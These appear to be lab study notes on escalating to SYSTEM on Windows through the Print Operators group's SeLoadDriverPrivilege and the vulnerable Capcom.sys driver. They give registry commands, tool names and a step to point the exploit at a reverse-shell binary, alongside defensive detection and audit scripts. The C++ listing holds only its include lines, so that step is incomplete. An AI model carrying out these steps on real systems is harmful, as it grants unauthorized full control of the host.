
Print Operators

METHOD: 1 - GUI

Use EnableSeLoadDriverPrivilege.cpp to enable the privilege and load the driver. Replace the contents of EnableSeLoadDriverPrivilege.cpp with the following code:

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

Compile the code above:

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Download Capcom.sys, save it to C:\temp, and add a registry reference to the driver. The ImagePath value below points at C:\Tools\Capcom.sys, so make sure the path written to the registry matches the location where the file was actually saved.

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
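The two reg add commands above write a driver service key (ImagePath and Type) under the user's own hive, which no legitimate installer does: real drivers are registered under HKLM\System\CurrentControlSet\Services, and HKCU is just HKU\<SID> of the current user. That makes the write itself a good detection point. The following is an added example, not code from this page or from the HTB module: it scans constructed Sysmon Event ID 13 (registry value set) lines in a simplified "Field=value" layout and flags any ImagePath or Type value written beneath a user hive's System\CurrentControlSet path. The SID, paths and event lines are made up for the example; the field names mirror Sysmon's, but a real deployment would read them from the event XML.

```python
import re

# Constructed sample lines in a simplified Sysmon Event ID 13 (RegistryEvent: value set)
# layout. They are not captured logs; the SID and paths are made up for the example.
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\System\CurrentControlSet\CAPCOM\ImagePath Details=\??\C:\Tools\Capcom.sys",
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\System\CurrentControlSet\CAPCOM\Type Details=DWORD (0x00000001)",
    # Benign: a service key under HKLM, where real services live.
    r"EventID=13 Image=C:\Windows\System32\services.exe TargetObject=HKLM\System\CurrentControlSet\Services\Spooler\Start Details=DWORD (0x00000002)",
    # Benign: an unrelated value under the same user hive.
    r"EventID=13 Image=C:\Windows\explorer.exe TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden Details=DWORD (0x00000001)",
    # Not a value-set event at all.
    r"EventID=1 Image=C:\Windows\System32\reg.exe CommandLine=reg query HKLM\Software",
]

# HKCU is really HKU\<SID>, which is how Sysmon records it. A driver service key
# (ImagePath/Type) under any user hive is abnormal: legitimate drivers are
# registered under HKLM\System\CurrentControlSet\Services. The optional
# "Services\" component covers both the page's path and a Services-style path.
USER_HIVE_DRIVER_KEY = re.compile(
    r"^(?:HKU\\[^\\]+|HKCU)\\System\\CurrentControlSet\\(?:Services\\)?"
    r"(?P<key>[^\\]+)\\(?P<value>ImagePath|Type)$",
    re.IGNORECASE,
)


def parse_event(line):
    """Split 'Field=value Field=value ...' into a dict; values may contain spaces."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", line))


def scan(lines):
    """Return one finding per value-set event that registers a driver under a user hive."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13":
            continue
        m = USER_HIVE_DRIVER_KEY.match(ev.get("TargetObject", ""))
        if not m:
            continue
        findings.append({
            "key": m["key"],
            "value": m["value"],
            "details": ev.get("Details", ""),
            "image": ev.get("Image", ""),
            "reason": f"{m['value']} written for driver key '{m['key']}' under a user hive",
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {f['reason']} by {f['image']}: {f['details']}")
```

Because the key lives in the user's hive, the write needs no elevation and is easy to miss if registry auditing only covers HKLM\System\CurrentControlSet\Services; the rule above deliberately keys on the hive prefix rather than on the CAPCOM name, so renaming the key does not evade it.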

Verify the driver is not yet loaded (DriverView.exe)

Run the compiled EnableSeLoadDriverPrivilege.exe and verify the privilege is enabled (whoami /priv)

Verify the Capcom driver is now listed (DriverView.exe)

Use the ExploitCapcom tool to escalate privileges.

METHOD: 2 - No GUI

Modify the ExploitCapcom.cpp code before compiling: change the CommandLine value to the path of a shell binary created with msfvenom.

Automating the steps

We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and calling NtLoadDriver to load the driver. The command is given in step 8 of the summary below.

Clean-up: delete the registry key (see step 9 of the summary below).

As of Windows 10 version 1803, SeLoadDriverPrivilege is not exploitable this way: the HKCU\System\CurrentControlSet registry path is no longer usable.

HTB module link: https://academy.hackthebox.com/module/67/section/605

Key Concepts

  • SeLoadDriverPrivilege:
    - The Print Operators group grants this privilege, allowing the loading of device drivers.
    - This privilege is often disabled by default and may require a UAC bypass.

  • Vulnerable driver (Capcom.sys):
    - This driver contains a vulnerability allowing arbitrary code execution with SYSTEM privileges.

  • Registry manipulation:
    - Registry keys are used to register the vulnerable driver.

  • Exploitation:
    - A custom tool (ExploitCapcom.exe) is used to exploit the driver and gain SYSTEM access.

Approach, Commands, Tools, and Techniques:

  1. Privilege check:
    - whoami /priv (verify SeLoadDriverPrivilege is present).
    - If not present, a UAC bypass is needed.

  2. UAC bypass:
    - UACMe tool.
    - Administrative command prompt.

  3. Driver registration:
    - reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
    - reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

  4. Driver verification:
    - DriverView.exe (Nirsoft).

  5. Privilege enablement:
    - EnableSeLoadDriverPrivilege.exe (custom tool).

  6. Driver load verification:
    - DriverView.exe (Nirsoft).

  7. Exploitation:
    - ExploitCapcom.exe (custom tool).
    - Modify ExploitCapcom.cpp for a reverse shell (if needed).

  8. Automation:
    - EoPLoadDriver.exe (automates driver loading).
    - EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

  9. Cleanup:
    - reg delete HKCU\System\CurrentControlSet\Capcom
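Step 1 and the key concepts above turn on one question for a defender: which accounts hold SeLoadDriverPrivilege, and in what state does it sit in their tokens? The following is an added example, not code from this page or from the HTB module. It parses constructed output in the layout of `whoami /priv` and of `net localgroup "Print Operators"` (the sample text is made up, not captured from a host) and classifies the token as absent, disabled or enabled with respect to SeLoadDriverPrivilege. "Disabled" is still the risky state the page describes, because a process holding the token can enable the privilege itself; "absent" is what a UAC-filtered token shows.

```python
import re

# Constructed sample output in the layout that `whoami /priv` prints (not captured
# from a real host). A Print Operators member with a non-filtered token typically
# sees SeLoadDriverPrivilege present but Disabled.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeLoadDriverPrivilege         Load and unload device drivers       Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
"""

# Constructed: the same user's UAC-filtered (medium integrity) token, where the
# privilege has been stripped entirely.
SAMPLE_WHOAMI_PRIV_FILTERED = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeShutdownPrivilege           Shut down the system                 Disabled
"""

# Constructed sample in the layout of `net localgroup "Print Operators"`; the
# member names are made up.
SAMPLE_NET_LOCALGROUP = """\
Alias name     Print Operators
Comment        Members can administer printers installed on domain controllers

Members

-------------------------------------------------------------------------------
alice
CORP\\svc-print
The command completed successfully.
"""


def parse_whoami_priv(text):
    """Map privilege name -> state ("Enabled"/"Disabled") from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        if not line.startswith("Se"):
            continue                    # skip headers, rule lines and blanks
        parts = re.split(r"\s{2,}", line.strip())   # columns are 2+ spaces apart
        if len(parts) == 3:
            privs[parts[0]] = parts[2]
    return privs


def assess_load_driver(text):
    """Classify the token with respect to SeLoadDriverPrivilege.

    absent   - not in this token (UAC-filtered token, or the user lacks it)
    disabled - granted but switched off; the process can enable it itself
    enabled  - already active in the token
    """
    state = parse_whoami_priv(text).get("SeLoadDriverPrivilege")
    return "absent" if state is None else state.lower()


def print_operators_members(text):
    """Extract member names from `net localgroup "Print Operators"` output."""
    members, in_members = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True           # the member list follows the rule line
            continue
        if in_members:
            if not line.strip() or line.startswith("The command completed"):
                break
            members.append(line.strip())
    return members


if __name__ == "__main__":
    print("full token:    ", assess_load_driver(SAMPLE_WHOAMI_PRIV))
    print("filtered token:", assess_load_driver(SAMPLE_WHOAMI_PRIV_FILTERED))
    print("Print Operators members:", print_operators_members(SAMPLE_NET_LOCALGROUP))
```

Run against real output (for example by feeding the two commands' output into the functions), this gives an audit of who carries the privilege; the mitigation is to keep Print Operators membership minimal and to treat any interactive member as a potential local SYSTEM on hosts where the registry path still works.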

Commands:

  • whoami /priv

  • reg add

  • reg delete

Tools:

  • UACMe

  • DriverView.exe (Nirsoft)

  • cl.exe (Microsoft C++ compiler)

  • EnableSeLoadDriverPrivilege.exe (custom tool)

  • ExploitCapcom.exe (custom tool)

  • EoPLoadDriver.exe

Techniques:

  • Leveraging SeLoadDriverPrivilege.

  • Exploiting vulnerable drivers.

  • Registry manipulation.

  • UAC bypass.

Important Notes:

  • The Capcom.sys driver is a known vulnerable driver.

  • The registry path HKCU\System\CurrentControlSet is not usable on Windows 10 1803 and later.

  • Always be very cautious when loading drivers.
